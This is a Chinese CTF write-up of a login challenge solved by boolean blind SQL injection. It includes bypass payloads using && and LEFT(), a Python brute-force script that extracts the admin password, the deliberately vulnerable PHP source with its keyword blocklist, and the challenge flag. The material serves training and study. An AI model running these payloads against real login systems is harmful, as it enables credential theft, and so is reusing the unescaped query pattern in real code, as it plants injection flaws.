打开题目,看到是让登录,查看网页源码可以发现一个hint
<!--hint:数据库中密码字段名为pass,有且只有一个用户名为admin的用户-->
这道题过滤的字符比较多
$filter = "mid|substr|*|s|and|select|from|where|union|join|sleep|benchmark|rollup|limit|like|rlike|regxp"; 以及空格（贴出的源码里其实看不到对空格的过滤）。注意列表里有单独的 s：如果这个过滤真的生效，下面 payload 里的 pass 本身就会被拦截；但正则中的 * 没有转义，PCRE 很可能报 "nothing to repeat" 编译失败，preg_match 返回 false 而不是 1，于是过滤实际上从不触发——请在目标环境验证。
根据提示可以猜到是要找到admin的密码。
and 被过滤了，可以用 && 替换；在 POST 体里要写成 URL 编码的 %26%26，否则原始的 & 会被当成参数分隔符。
所以可以构造 payload user=admin'%26%26length(pass)='1&pass=1 先来确定密码的长度：条件成立时 admin 这一行被查出来，服务端返回 "password error!"（我们故意填错密码）；条件不成立时一行都查不到，返回 "no such user!"。两种回显的差异就是布尔盲注的判断依据。
可以用脚本跑.....也可以手动...
确定好密码长度后，再构造 payload 逐位爆破密码
user=admin'%26%26left(pass,1)='0&pass=1
附上py脚本
import requests
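def getlen(url, *, max_len=64, post=None):
    """Blind-boolean probe for the length of admin's password.

    Sends ``user=admin'&&length(pass)='<i>`` for i = 1..max_len with a
    dummy password. When the length guess is right the injected WHERE
    clause matches the single admin row and the server answers
    "password error!"; for every other guess no row matches and it
    answers "no such user!".

    Args:
        url: login endpoint to POST to.
        max_len: largest length to try before giving up. The original
            looped forever when no guess ever matched (e.g. the filter
            actually firing, or a changed response string).
        post: callable ``post(url, data)`` returning an object with a
            ``.text`` attribute; defaults to ``requests.post``. Injectable
            so the oracle logic can be tested offline.

    Returns:
        The password length, or None if no length in 1..max_len matched.
    """
    if post is None:
        post = requests.post
    for i in range(1, max_len + 1):
        payload = {'user': "admin'&&length(pass)='%d" % i, 'pass': '123456'}
        # Use .text (str), not .content (bytes): str.find on bytes raises
        # TypeError on Python 3, which the rest of the script targets.
        text = post(url, payload).text
        if "password error!" in text:
            return i
    return None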
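def getpwd(url, len, list, *, post=None):
    """Recover the password one character at a time via a prefix oracle.

    For position i in 1..len, every candidate c in ``list`` is sent as
    ``user=admin'&&left(pass,i)='<prefix+c>``. The server answers
    "password error!" only when the prefix is correct (the admin row
    matched), so the matching c is appended to the prefix and printed.

    Args:
        url: login endpoint to POST to.
        len: password length (as returned by getlen). The name shadows the
            builtin inside this body; kept for backward compatibility.
        list: candidate characters, tried in order. Same caveat.
        post: callable ``post(url, data)`` returning an object with a
            ``.text`` attribute; defaults to ``requests.post``. Injectable
            so the oracle logic can be tested offline.

    Returns:
        The recovered prefix — the full password when every position
        matched. If no candidate matches some position (alphabet too
        small), the search stops there instead of continuing with a wrong
        prefix as the original did.
    """
    if post is None:
        post = requests.post
    found = ""
    for pos in range(1, len + 1):
        for c in list:
            payload = {'user': "admin'&&left(pass,%d)='%s" % (pos, found + c),
                       'pass': '123456'}
            # .text, not .content: comparing str against bytes fails on Python 3.
            text = post(url, payload).text
            if "password error!" in text:
                found += c
                print(found)
                break
        else:
            # Nothing matched at this position: every later position would be
            # tested against a wrong prefix, so stop and return what we have.
            break
    return found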
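if __name__ == '__main__':
    # Candidate alphabet: digits first, then lowercase letters. Uppercase is
    # left out as in the original script; set INCLUDE_UPPER to add A-Z.
    # NOTE(review): under MySQL's default case-insensitive collation
    # left(pass,n)='a' also matches 'A', so letters may come back in the
    # wrong case — confirm against the flag check if the result is rejected.
    INCLUDE_UPPER = False
    charset = [str(d) for d in range(10)]
    if INCLUDE_UPPER:
        charset.extend(chr(o) for o in range(65, 91))
    charset.extend(chr(o) for o in range(97, 123))
    url = "http://"  # TODO: fill in the challenge URL
    pwd_len = getlen(url)
    print(pwd_len)
    if pwd_len is None:
        raise SystemExit("could not determine password length; is the oracle response unchanged?")
    getpwd(url, pwd_len, charset)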
LEFT(string, number_of_chars)
LEFT() 函数从字符串左侧开始提取前 number_of_chars 个字符。因为 mid、substr 都在过滤列表里，所以这里用 LEFT() 逐位比较密码前缀。
附上php源码
<?php
// sql injection bypass,
// NOTE(review): error_reporting(0) also hides the PCRE warning that the
// filter pattern in AttackFilter would emit if it fails to compile.
error_reporting(0);
// Without both POST fields, render the login form plus the hint and stop.
if (!isset($_POST['user']) || !isset($_POST['pass'])) {
?>
<!DOCTYPE html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<title>Fullscreen Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- CSS -->
<link rel='stylesheet' href='http://fonts.googleapis.com/css?family=PT+Sans:400,700'>
<link rel="stylesheet" href="assets/css/reset.css">
<link rel="stylesheet" href="assets/css/supersized.css">
<link rel="stylesheet" href="assets/css/style.css">
<!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>
<body>
<div class="page-container">
<h1>Login</h1>
<form action="" method="post">
<input type="text" name="user" class="username" placeholder="Username">
<input type="password" name="pass" class="password" placeholder="Password">
<button type="submit">Sign in</button>
<div class="error"><span>+</span></div>
</form>
</div>
<!-- Javascript -->
<script src="assets/js/jquery-1.8.2.min.js"></script>
<script src="assets/js/supersized.3.2.7.min.js"></script>
<script src="assets/js/supersized-init.js"></script>
<script src="assets/js/scripts.js"></script>
</body>
</html>
<?php
// The hint (column name "pass", exactly one "admin" user) is leaked in an
// HTML comment; the writeup's payloads depend on it.
echo '<!--hint:数据库中密码字段名为pass,有且只有一个用户名为admin的用户-->'."<br/>";
die;
}
// Reject the request with "naive" when a POST value matches the blocklist
// regex $ArrReq (case-insensitive, "." spans newlines). $StrKey is accepted
// but never inspected. Array-valued fields (user[]=...) are flattened first.
function AttackFilter($StrKey,$StrValue,$ArrReq){
    $haystack = is_array($StrValue) ? implode($StrValue) : $StrValue;
    // Only an explicit 1 counts as a hit; a false from a pattern that fails
    // to compile (see the "*" alternative in $filter) lets the value through.
    if (preg_match("/".$ArrReq."/is", $haystack) == 1) {
        print "naive";
        exit();
    }
}
// Blocklist applied to every POST value (keys are ignored).
// NOTE(review): the bare "*" alternative has nothing to repeat, which PCRE
// treats as a compile error; preg_match then returns false, false == 1 is
// not true, and the filter silently never fires. That is consistent with the
// writeup's payloads working although they contain "s" (in "pass"), which
// is on the list. Verify on the target PHP/PCRE version. "regxp" is also a
// typo for "regexp".
$filter = "mid|substr|*|s|and|select|from|where|union|join|sleep|benchmark|rollup|limit|like|rlike|regxp";
foreach($_POST as $key=>$value){
AttackFilter($key,$value,$filter);
}
// Legacy mysql_* extension (removed in PHP 7); credentials are placeholders.
$con = mysql_connect("localhost","帐号","密码");
if (!$con){
die('Could not connect: ' . mysql_error());
}
$db="ctf";
mysql_select_db($db, $con);
// Injection point: $_POST['user'] is interpolated unescaped into the query.
// "admin'&&length(pass)='1" makes the row match only when the predicate
// holds, turning the two distinct messages below into a boolean oracle.
$sql="SELECT * FROM ctfinterest WHERE user = '{$_POST['user']}'";
$query = mysql_query($sql);
// Exactly one row (the single admin row, per the hint) reaches the password
// check; otherwise "no such user!". The "password error!" / "no such user!"
// split is what the blind injection observes.
if (mysql_num_rows($query) == 1) {
$key = mysql_fetch_array($query);
// NOTE(review): loose == comparison — a numeric-looking stored password
// would be subject to PHP type juggling; not exercised by this writeup.
if($key['pass'] == $_POST['pass']) {
print "Flag{0f_C0urse_Y0u_C4n_D0_1t!}";
}else{
print "password error!";
}
}else{
print "no such user!";
}
mysql_close($con);
?>